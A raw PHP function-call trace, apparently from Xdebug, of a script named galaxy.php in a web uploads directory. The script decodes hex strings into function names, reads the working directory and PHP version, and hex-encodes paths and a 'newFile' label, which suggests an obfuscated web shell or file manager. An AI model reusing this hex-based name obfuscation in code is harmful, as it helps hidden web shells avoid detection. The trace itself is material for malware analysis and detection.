3	357	0	0.013295	480936	chr	0		/var/www/html/uploads/galaxy.php	25	1	108
3	357	1	0.013306	480976
3	357	R			'l'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'l'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	358	0	0.013335	480968	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	358	1	0.013347	481016
3	358	R			115
3	359	0	0.013359	480936	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	359	1	0.013370	480976
3	359	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	360	0	0.013398	480968	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'70'
3	360	1	0.013410	481016
3	360	R			112
3	361	0	0.013422	480936	chr	0		/var/www/html/uploads/galaxy.php	25	1	112
3	361	1	0.013433	480976
3	361	R			'p'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'p'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	362	0	0.013462	480968	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	362	1	0.013474	481016
3	362	R			101
3	363	0	0.013486	480936	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	363	1	0.013497	480976
3	363	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	364	0	0.013526	480968	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'63'
3	364	1	0.013537	481016
3	364	R			99
3	365	0	0.013549	480936	chr	0		/var/www/html/uploads/galaxy.php	25	1	99
3	365	1	0.013560	480976
3	365	R			'c'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'c'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	366	0	0.013589	480976	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	366	1	0.013601	481024
3	366	R			105
3	367	0	0.013612	480944	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	367	1	0.013624	480984
3	367	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	368	0	0.013653	480976	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'61'
3	368	1	0.013664	481024
3	368	R			97
3	369	0	0.013676	480944	chr	0		/var/www/html/uploads/galaxy.php	25	1	97
3	369	1	0.013687	480984
3	369	R			'a'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'a'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	370	0	0.013716	480976	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6c'
3	370	1	0.013728	481024
3	370	R			108
3	371	0	0.013739	480944	chr	0		/var/www/html/uploads/galaxy.php	25	1	108
3	371	1	0.013750	480984
3	371	R			'l'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'l'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	372	0	0.013780	480976	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'63'
3	372	1	0.013791	481024
3	372	R			99
3	373	0	0.013803	480944	chr	0		/var/www/html/uploads/galaxy.php	25	1	99
3	373	1	0.013814	480984
3	373	R			'c'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'c'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	374	0	0.013843	480976	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'68'
3	374	1	0.013854	481024
3	374	R			104
3	375	0	0.013866	480944	chr	0		/var/www/html/uploads/galaxy.php	25	1	104
3	375	1	0.013877	480984
3	375	R			'h'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'h'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	376	0	0.013906	480976	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'61'
3	376	1	0.013918	481024
3	376	R			97
3	377	0	0.013934	480944	chr	0		/var/www/html/uploads/galaxy.php	25	1	97
3	377	1	0.013945	480984
3	377	R			'a'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'a'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	378	0	0.013974	480976	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'72'
3	378	1	0.013986	481024
3	378	R			114
3	379	0	0.013998	480944	chr	0		/var/www/html/uploads/galaxy.php	25	1	114
3	379	1	0.014009	480984
3	379	R			'r'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'r'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	380	0	0.014038	480976	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'73'
3	380	1	0.014050	481024
3	380	R			115
3	381	0	0.014062	480944	chr	0		/var/www/html/uploads/galaxy.php	25	1	115
3	381	1	0.014073	480984
3	381	R			's'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 's'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	349	1	0.014102	480952
2	349	R			'htmlspecialchars'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[18] = 'htmlspecialchars'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	382	0	0.014137	480952	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'64617465'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 7
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	383	0	0.014177	480984	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'64'
3	383	1	0.014189	481032
3	383	R			100
3	384	0	0.014200	480952	chr	0		/var/www/html/uploads/galaxy.php	25	1	100
3	384	1	0.014212	480992
3	384	R			'd'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'd'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	385	0	0.014242	481016	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'61'
3	385	1	0.014254	481064
3	385	R			97
3	386	0	0.014266	480984	chr	0		/var/www/html/uploads/galaxy.php	25	1	97
3	386	1	0.014278	481024
3	386	R			'a'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'a'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	387	0	0.014307	481016	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	387	1	0.014319	481064
3	387	R			116
3	388	0	0.014331	480984	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	388	1	0.014342	481024
3	388	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	389	0	0.014373	481016	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	389	1	0.014384	481064
3	389	R			101
3	390	0	0.014396	480984	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	390	1	0.014407	481024
3	390	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	382	1	0.014437	480984
2	382	R			'date'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[19] = 'date'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	391	0	0.014469	480984	nhx	1		/var/www/html/uploads/galaxy.php	8	1	'66696c656d74696d65'
2		A						/var/www/html/uploads/galaxy.php	22	$r = ''
2		A						/var/www/html/uploads/galaxy.php	23	$len = 17
2		A						/var/www/html/uploads/galaxy.php	24	$i = 0
3	392	0	0.014510	481016	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'66'
3	392	1	0.014522	481064
3	392	R			102
3	393	0	0.014534	480984	chr	0		/var/www/html/uploads/galaxy.php	25	1	102
3	393	1	0.014545	481024
3	393	R			'f'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'f'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	394	0	0.014575	481048	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	394	1	0.014587	481096
3	394	R			105
3	395	0	0.014599	481016	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	395	1	0.014610	481056
3	395	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	396	0	0.014639	481048	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6c'
3	396	1	0.014653	481096
3	396	R			108
3	397	0	0.014666	481016	chr	0		/var/www/html/uploads/galaxy.php	25	1	108
3	397	1	0.014677	481056
3	397	R			'l'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'l'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	398	0	0.014706	481048	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	398	1	0.014718	481096
3	398	R			101
3	399	0	0.014729	481016	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	399	1	0.014741	481056
3	399	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	400	0	0.014770	481048	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6d'
3	400	1	0.014782	481096
3	400	R			109
3	401	0	0.014794	481016	chr	0		/var/www/html/uploads/galaxy.php	25	1	109
3	401	1	0.014812	481056
3	401	R			'm'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'm'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	402	0	0.014842	481048	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'74'
3	402	1	0.014853	481096
3	402	R			116
3	403	0	0.014865	481016	chr	0		/var/www/html/uploads/galaxy.php	25	1	116
3	403	1	0.014877	481056
3	403	R			't'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 't'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	404	0	0.014905	481048	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'69'
3	404	1	0.014917	481096
3	404	R			105
3	405	0	0.014929	481016	chr	0		/var/www/html/uploads/galaxy.php	25	1	105
3	405	1	0.014940	481056
3	405	R			'i'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'i'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	406	0	0.014969	481048	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'6d'
3	406	1	0.014980	481096
3	406	R			109
3	407	0	0.014992	481016	chr	0		/var/www/html/uploads/galaxy.php	25	1	109
3	407	1	0.015003	481056
3	407	R			'm'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'm'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
3	408	0	0.015031	481056	hexdec	0		/var/www/html/uploads/galaxy.php	25	1	'65'
3	408	1	0.015043	481104
3	408	R			101
3	409	0	0.015055	481024	chr	0		/var/www/html/uploads/galaxy.php	25	1	101
3	409	1	0.015066	481064
3	409	R			'e'
2		A						/var/www/html/uploads/galaxy.php	25	$r .= 'e'
2		A						/var/www/html/uploads/galaxy.php	24	$i += 2
2	391	1	0.015095	481024
2	391	R			'filemtime'
1		A						/var/www/html/uploads/galaxy.php	8	$fc[20] = 'filemtime'
1		A						/var/www/html/uploads/galaxy.php	7	$i++
2	410	0	0.015130	481024	getcwd	0		/var/www/html/uploads/galaxy.php	13	0
2	410	1	0.015145	481072
2	410	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/galaxy.php	13	$p = '/var/www/html/uploads'
2	411	0	0.015174	481072	phpversion	0		/var/www/html/uploads/galaxy.php	68	0
2	411	1	0.015186	481136
2	411	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
2	412	0	0.015202	481072	hex	1		/var/www/html/uploads/galaxy.php	68	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	413	0	0.015233	481072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	413	1	0.015245	481112
3	413	R			47
3	414	0	0.015257	481072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	414	1	0.015268	481144
3	414	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	415	0	0.015300	481104	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	415	1	0.015311	481144
3	415	R			118
3	416	0	0.015323	481104	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	416	1	0.015334	481176
3	416	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	417	0	0.015364	481104	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	417	1	0.015380	481144
3	417	R			97
3	418	0	0.015392	481104	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	418	1	0.015404	481176
3	418	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	419	0	0.015433	481104	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	419	1	0.015445	481144
3	419	R			114
3	420	0	0.015457	481104	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	420	1	0.015468	481176
3	420	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	421	0	0.015497	481112	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	421	1	0.015509	481152
3	421	R			47
3	422	0	0.015520	481112	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	422	1	0.015531	481184
3	422	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	423	0	0.015561	481112	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	423	1	0.015572	481152
3	423	R			119
3	424	0	0.015584	481112	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	424	1	0.015595	481184
3	424	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	425	0	0.015624	481112	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	425	1	0.015635	481152
3	425	R			119
3	426	0	0.015647	481112	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	426	1	0.015659	481184
3	426	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	427	0	0.015687	481112	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	427	1	0.015698	481152
3	427	R			119
3	428	0	0.015711	481112	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	428	1	0.015722	481184
3	428	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	429	0	0.015750	481120	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	429	1	0.015761	481160
3	429	R			47
3	430	0	0.015773	481120	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	430	1	0.015785	481192
3	430	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	431	0	0.015814	481120	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	431	1	0.015825	481160
3	431	R			104
3	432	0	0.015837	481120	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	432	1	0.015848	481192
3	432	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	433	0	0.015877	481120	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	433	1	0.015888	481160
3	433	R			116
3	434	0	0.015900	481120	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	434	1	0.015911	481192
3	434	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	435	0	0.015940	481120	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	435	1	0.015952	481160
3	435	R			109
3	436	0	0.015964	481120	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	436	1	0.015975	481192
3	436	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	437	0	0.016004	481128	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	437	1	0.016015	481168
3	437	R			108
3	438	0	0.016027	481128	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	438	1	0.016038	481200
3	438	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	439	0	0.016067	481128	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	439	1	0.016079	481168
3	439	R			47
3	440	0	0.016093	481128	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	440	1	0.016105	481200
3	440	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	441	0	0.016134	481128	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	441	1	0.016145	481168
3	441	R			117
3	442	0	0.016157	481128	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	442	1	0.016168	481200
3	442	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	443	0	0.016196	481128	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	443	1	0.016207	481168
3	443	R			112
3	444	0	0.016219	481128	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	444	1	0.016230	481200
3	444	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	445	0	0.016259	481136	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	445	1	0.016270	481176
3	445	R			108
3	446	0	0.016282	481136	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	446	1	0.016294	481208
3	446	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	447	0	0.016322	481136	ord	0		/var/www/html/uploads/galaxy.php	18	1	'o'
3	447	1	0.016333	481176
3	447	R			111
3	448	0	0.016345	481136	dechex	0		/var/www/html/uploads/galaxy.php	18	1	111
3	448	1	0.016356	481208
3	448	R			'6f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	449	0	0.016384	481136	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	449	1	0.016395	481176
3	449	R			97
3	450	0	0.016407	481136	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	450	1	0.016418	481208
3	450	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	451	0	0.016447	481136	ord	0		/var/www/html/uploads/galaxy.php	18	1	'd'
3	451	1	0.016458	481176
3	451	R			100
3	452	0	0.016470	481136	dechex	0		/var/www/html/uploads/galaxy.php	18	1	100
3	452	1	0.016481	481208
3	452	R			'64'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '64'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	453	0	0.016510	481152	ord	0		/var/www/html/uploads/galaxy.php	18	1	's'
3	453	1	0.016521	481192
3	453	R			115
3	454	0	0.016534	481152	dechex	0		/var/www/html/uploads/galaxy.php	18	1	115
3	454	1	0.016545	481224
3	454	R			'73'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '73'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	412	1	0.016573	481152
2	412	R			'2f7661722f7777772f68746d6c2f75706c6f616473'
2	455	0	0.016589	481152	hex	1		/var/www/html/uploads/galaxy.php	68	1	'newFile'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	456	0	0.016620	481152	ord	0		/var/www/html/uploads/galaxy.php	18	1	'n'
3	456	1	0.016631	481192
3	456	R			110
3	457	0	0.016643	481152	dechex	0		/var/www/html/uploads/galaxy.php	18	1	110
3	457	1	0.016655	481224
3	457	R			'6e'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6e'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	458	0	0.016683	481184	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	458	1	0.016694	481224
3	458	R			101
3	459	0	0.016706	481184	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	459	1	0.016718	481256
3	459	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	460	0	0.016746	481184	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	460	1	0.016757	481224
3	460	R			119
3	461	0	0.016769	481184	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	461	1	0.016781	481256
3	461	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	462	0	0.016814	481184	ord	0		/var/www/html/uploads/galaxy.php	18	1	'F'
3	462	1	0.016826	481224
3	462	R			70
3	463	0	0.016837	481184	dechex	0		/var/www/html/uploads/galaxy.php	18	1	70
3	463	1	0.016848	481256
3	463	R			'46'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '46'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	464	0	0.016879	481192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'i'
3	464	1	0.016950	481232
3	464	R			105
3	465	0	0.016964	481192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	105
3	465	1	0.016976	481264
3	465	R			'69'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '69'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	466	0	0.017006	481192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	466	1	0.017017	481232
3	466	R			108
3	467	0	0.017029	481192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	467	1	0.017040	481264
3	467	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	468	0	0.017069	481192	ord	0		/var/www/html/uploads/galaxy.php	18	1	'e'
3	468	1	0.017080	481232
3	468	R			101
3	469	0	0.017092	481192	dechex	0		/var/www/html/uploads/galaxy.php	18	1	101
3	469	1	0.017103	481264
3	469	R			'65'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '65'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
2	455	1	0.017132	481192
2	455	R			'6e657746696c65'
2	470	0	0.017146	481072	hex	1		/var/www/html/uploads/galaxy.php	68	1	'/var/www/html/uploads'
2		A						/var/www/html/uploads/galaxy.php	16	$r = ''
2		A						/var/www/html/uploads/galaxy.php	17	$i = 0
3	471	0	0.017176	481072	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	471	1	0.017188	481112
3	471	R			47
3	472	0	0.017200	481072	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	472	1	0.017211	481144
3	472	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	473	0	0.017240	481104	ord	0		/var/www/html/uploads/galaxy.php	18	1	'v'
3	473	1	0.017252	481144
3	473	R			118
3	474	0	0.017264	481104	dechex	0		/var/www/html/uploads/galaxy.php	18	1	118
3	474	1	0.017275	481176
3	474	R			'76'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '76'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	475	0	0.017304	481104	ord	0		/var/www/html/uploads/galaxy.php	18	1	'a'
3	475	1	0.017315	481144
3	475	R			97
3	476	0	0.017327	481104	dechex	0		/var/www/html/uploads/galaxy.php	18	1	97
3	476	1	0.017338	481176
3	476	R			'61'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '61'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	477	0	0.017367	481104	ord	0		/var/www/html/uploads/galaxy.php	18	1	'r'
3	477	1	0.017378	481144
3	477	R			114
3	478	0	0.017390	481104	dechex	0		/var/www/html/uploads/galaxy.php	18	1	114
3	478	1	0.017401	481176
3	478	R			'72'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '72'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	479	0	0.017429	481112	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	479	1	0.017440	481152
3	479	R			47
3	480	0	0.017453	481112	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	480	1	0.017464	481184
3	480	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	481	0	0.017493	481112	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	481	1	0.017504	481152
3	481	R			119
3	482	0	0.017517	481112	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	482	1	0.017528	481184
3	482	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	483	0	0.017557	481112	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	483	1	0.017573	481152
3	483	R			119
3	484	0	0.017585	481112	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	484	1	0.017597	481184
3	484	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	485	0	0.017625	481112	ord	0		/var/www/html/uploads/galaxy.php	18	1	'w'
3	485	1	0.017637	481152
3	485	R			119
3	486	0	0.017649	481112	dechex	0		/var/www/html/uploads/galaxy.php	18	1	119
3	486	1	0.017660	481184
3	486	R			'77'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '77'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	487	0	0.017689	481120	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	487	1	0.017700	481160
3	487	R			47
3	488	0	0.017712	481120	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	488	1	0.017723	481192
3	488	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	489	0	0.017752	481120	ord	0		/var/www/html/uploads/galaxy.php	18	1	'h'
3	489	1	0.017762	481160
3	489	R			104
3	490	0	0.017775	481120	dechex	0		/var/www/html/uploads/galaxy.php	18	1	104
3	490	1	0.017786	481192
3	490	R			'68'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '68'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	491	0	0.017815	481120	ord	0		/var/www/html/uploads/galaxy.php	18	1	't'
3	491	1	0.017826	481160
3	491	R			116
3	492	0	0.017838	481120	dechex	0		/var/www/html/uploads/galaxy.php	18	1	116
3	492	1	0.017850	481192
3	492	R			'74'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '74'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	493	0	0.017878	481120	ord	0		/var/www/html/uploads/galaxy.php	18	1	'm'
3	493	1	0.017890	481160
3	493	R			109
3	494	0	0.017902	481120	dechex	0		/var/www/html/uploads/galaxy.php	18	1	109
3	494	1	0.017913	481192
3	494	R			'6d'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6d'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	495	0	0.017942	481128	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	495	1	0.017953	481168
3	495	R			108
3	496	0	0.017965	481128	dechex	0		/var/www/html/uploads/galaxy.php	18	1	108
3	496	1	0.017977	481200
3	496	R			'6c'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '6c'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	497	0	0.018006	481128	ord	0		/var/www/html/uploads/galaxy.php	18	1	'/'
3	497	1	0.018017	481168
3	497	R			47
3	498	0	0.018029	481128	dechex	0		/var/www/html/uploads/galaxy.php	18	1	47
3	498	1	0.018040	481200
3	498	R			'2f'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '2f'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	499	0	0.018069	481128	ord	0		/var/www/html/uploads/galaxy.php	18	1	'u'
3	499	1	0.018081	481168
3	499	R			117
3	500	0	0.018092	481128	dechex	0		/var/www/html/uploads/galaxy.php	18	1	117
3	500	1	0.018103	481200
3	500	R			'75'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '75'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	501	0	0.018132	481128	ord	0		/var/www/html/uploads/galaxy.php	18	1	'p'
3	501	1	0.018143	481168
3	501	R			112
3	502	0	0.018155	481128	dechex	0		/var/www/html/uploads/galaxy.php	18	1	112
3	502	1	0.018166	481200
3	502	R			'70'
2		A						/var/www/html/uploads/galaxy.php	18	$r .= '70'
2		A						/var/www/html/uploads/galaxy.php	17	$i++
3	503	0	0.018195	481136	ord	0		/var/www/html/uploads/galaxy.php	18	1	'l'
3	503	1	0.018206	481176
3	503	R			108
